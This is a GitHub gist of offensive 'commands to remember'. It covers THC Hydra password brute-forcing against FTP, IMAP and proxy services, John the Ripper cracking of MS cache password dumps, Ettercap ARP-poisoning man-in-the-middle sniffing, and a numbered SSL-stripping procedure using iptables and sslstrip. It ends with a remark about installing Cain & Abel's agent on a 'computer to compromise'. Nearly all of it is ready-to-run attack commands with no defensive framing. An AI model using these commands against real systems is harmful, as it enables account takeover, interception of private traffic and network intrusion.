Skip to content

Instantly share code, notes, and snippets.

@cmartinbaughman
Created October 25, 2011 20:38
Show Gist options
  • Save cmartinbaughman/1314184 to your computer and use it in GitHub Desktop.
Save cmartinbaughman/1314184 to your computer and use it in GitHub Desktop.
Commands to remember...
#Cracking an FTP server (use whatever service you want THC Hydra supports lots!
hydra -L wordlist.txt -P passlist.txt 192.168.1.1 ftp
#Other handy THC Hydra commands~!
#Log in to ftp service with -l user and -p password:
./hydra -l john -p doe 192.168.0.1 ftp
#Log in to IMAP service using user wordlist with -L user.txt and the password -p secret:
./hydra -L user.txt -p secret 192.168.0.1 imap PLAIN
#Log in to http-proxy trying user -l admin and password list:
./hydra -l admin -P pass.txt http-proxy://192.168.0.1
#Using -C argument to use a username:password formatted text file and the -6 uses IPv6:
./hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN
#Crack MS CACHE password dumps:
#dumpfile in format: admin:23acb302913da1293840329a12931ac
john -i:all -format:mscash dumpfile.txt
#Ettercap Man In The Middle ARP sniffing attack:
#NOTE: Launch ettercap GUI with packet dump:
ettercap -G -w ~/ettercap_packets.pcap
#Stripping SSL with Ettercap and sslstrip:
1. Redirect requests on port 80 (HTTP) to sslstrip running on port 10000
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
2. Verify the entry in nat table
sudo iptables --list -t nat
3. Enable forwarding
sudo echo "1" > /proc/sys/net/ipv4/ip_forward
4. Check forwarding
sudo cat /proc/sys/net/ipv4/ip_forward (*NOTE: You should get 1 as a reply)
5. Run sslstrip logging on port 10000
sudo python sslstrip-0.7/sslstrip.py -w sslstrip.log -l 10000
6. Monitor the log
sudo tail -F sslstrip.log
7. ettercap -G -w ~/ettercap_packets.pcap and perform the following in the GTK Ettercap NG GUI:
a. Sniff -> Unified sniffing
b. Hosts -> Scan for hosts && Hosts -> Hosts List
c. Targets: TARGET 1 - Host(s) you want to attack, TARGET 2 - IP of router/switch/ or access point
d. Mitm -> Arp poisoning - turn on Sniffing!
#CAIN & ABEL
#Open Cain (Gui) go to networking and select the computer to compromise, then right click and select install Abel, then you can do all kinds of stuff ;)
@rad123456789r
Copy link

pass

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment